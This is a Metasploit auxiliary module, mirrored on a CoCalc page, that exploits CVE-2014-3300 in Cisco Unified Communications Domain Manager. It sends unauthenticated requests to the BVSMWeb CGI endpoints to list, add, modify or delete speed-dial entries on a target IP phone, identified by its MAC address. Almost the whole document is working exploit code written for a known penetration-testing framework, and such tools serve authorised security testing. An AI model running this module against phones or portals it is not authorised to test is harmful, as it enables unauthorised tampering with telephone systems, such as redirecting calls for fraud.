CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'rexml/document'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'          => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',

14
      'Description'   => %q{

15
        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager

16
        (CDM), before version 10, doesn't implement access control properly, which allows remote

17
        attackers to modify user information. This module exploits the vulnerability to make

18
        unauthorized speed dial entity manipulations.

19
      },

20
      'Author'        => 'fozavci',

21
      'References'    =>

22
        [

23
          ['CVE', '2014-3300'],

24
          ['BID', '68331']

25
        ],

26
      'License'       => MSF_LICENSE,

27
      'Actions'       =>

28
        [

29
          [ 'List',   { 'Description' => 'Getting the speeddials for the MAC address' } ],

30
          [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],

31
          [ 'Add',    { 'Description' => 'Adding a speeddial for the MAC address' } ],

32
          [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]

33
        ],

34
      'DefaultAction'  => 'List'

35
    ))

36


37
    register_options(

38
    [

39
      OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),

40
      OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),

41
      OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),

42
      OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),

43
      OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),

44
    ])

45
  end

46


47
  def run

48


49
    case action.name.upcase

50
      when 'MODIFY'

51
        modify

52
      when 'DELETE'

53
        delete

54
      when 'ADD'

55
        add

56
      when 'LIST'

57
        list

58
    end

59


60
  end

61


62
  def send_rcv(uri, vars_get)

63
    uri = normalize_uri(target_uri.to_s, uri.to_s)

64
    res = send_request_cgi(

65
      {

66
        'uri'    => uri,

67
        'method' => 'GET',

68
        'vars_get' => vars_get

69
      })

70


71
    if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/

72
      return Exploit::CheckCode::Vulnerable, res

73
    else

74
      print_error("Target appears not vulnerable!")

75
      return Exploit::CheckCode::Safe, res

76
    end

77
  end

78


79
  def parse(res)

80
    doc = REXML::Document.new(res.body)

81
    names = []

82
    phones = []

83


84
    list = doc.root.get_elements('DirectoryEntry')

85
    list.each do |lst|

86
      xlist = lst.get_elements('Name')

87
      xlist.each {|l| names << "#{l[0]}"}

88
      xlist = lst.get_elements('Telephone')

89
      xlist.each {|l| phones << "#{l[0]}" }

90
    end

91


92
    if names.size > 0

93
      names.size.times do |i|

94
        info = ''

95
        info << "Position: #{names[i].split(":")[0]}, "

96
        info << "Name: #{names[i].split(":")[1]}, "

97
        info << "Telephone: #{phones[i]}"

98


99
        print_good("#{info}")

100
      end

101
    else

102
      print_status("No Speed Dial detected")

103
    end

104
  end

105


106
  def list

107
    mac = datastore['MAC']

108


109
    print_status("Getting Speed Dials of the IP phone")

110
    vars_get = {

111
      'device' => "SEP#{mac}"

112
    }

113


114
    status, res = send_rcv('speeddials.cgi', vars_get)

115
    parse(res) unless status == Exploit::CheckCode::Safe

116
  end

117


118
  def add

119
    mac = datastore['MAC']

120
    name = datastore['NAME']

121
    position = datastore['POSITION']

122
    telno = datastore['TELNO']

123


124
    print_status("Adding Speed Dial to the IP phone")

125
    vars_get = {

126
      'name' => "#{name}",

127
      'telno' => "#{telno}",

128
      'device' => "SEP#{mac}",

129
      'entry' => "#{position}",

130
      'mac' => "#{mac}"

131
    }

132
    status, res = send_rcv('phonespeedialadd.cgi', vars_get)

133


134
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/

135
      print_good("Speed Dial #{position} is added successfully")

136
    elsif res && res.body && res.body.to_s =~ /exist/

137
      print_error("Speed Dial is exist, change the position or choose modify!")

138
    else

139
      print_error("Speed Dial couldn't add!")

140
    end

141
  end

142


143
  def delete

144
    mac = datastore['MAC']

145
    position = datastore['POSITION']

146


147
    print_status("Deleting Speed Dial of the IP phone")

148


149
    vars_get = {

150
      'entry' => "#{position}",

151
      'device' => "SEP#{mac}"

152
    }

153


154
    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

155


156
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/

157
      print_good("Speed Dial #{position} is deleted successfully")

158
    else

159
      print_error("Speed Dial is not found!")

160
    end

161
  end

162


163
  def modify

164
    mac = datastore['MAC']

165
    name = datastore['NAME']

166
    position = datastore['POSITION']

167
    telno = datastore['TELNO']

168


169
    print_status("Deleting Speed Dial of the IP phone")

170


171
    vars_get = {

172
      'entry' => "#{position}",

173
      'device' => "SEP#{mac}"

174
    }

175


176
    status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)

177


178
    if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/

179
      print_good("Speed Dial #{position} is deleted successfully")

180
      print_status("Adding Speed Dial to the IP phone")

181


182
      vars_get = {

183
        'name' => "#{name}",

184
        'telno' => "#{telno}",

185
        'device' => "SEP#{mac}",

186
        'entry' => "#{position}",

187
        'mac' => "#{mac}"

188
      }

189


190
      status, res = send_rcv('phonespeedialadd.cgi', vars_get)

191


192
      if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/

193
        print_good("Speed Dial #{position} is added successfully")

194
      elsif res && res.body =~ /exist/

195
        print_error("Speed Dial is exist, change the position or choose modify!")

196
      else

197
        print_error("Speed Dial couldn't add!")

198
      end

199
    else

200
      print_error("Speed Dial is not found!")

201
    end

202
  end

203
end

204


205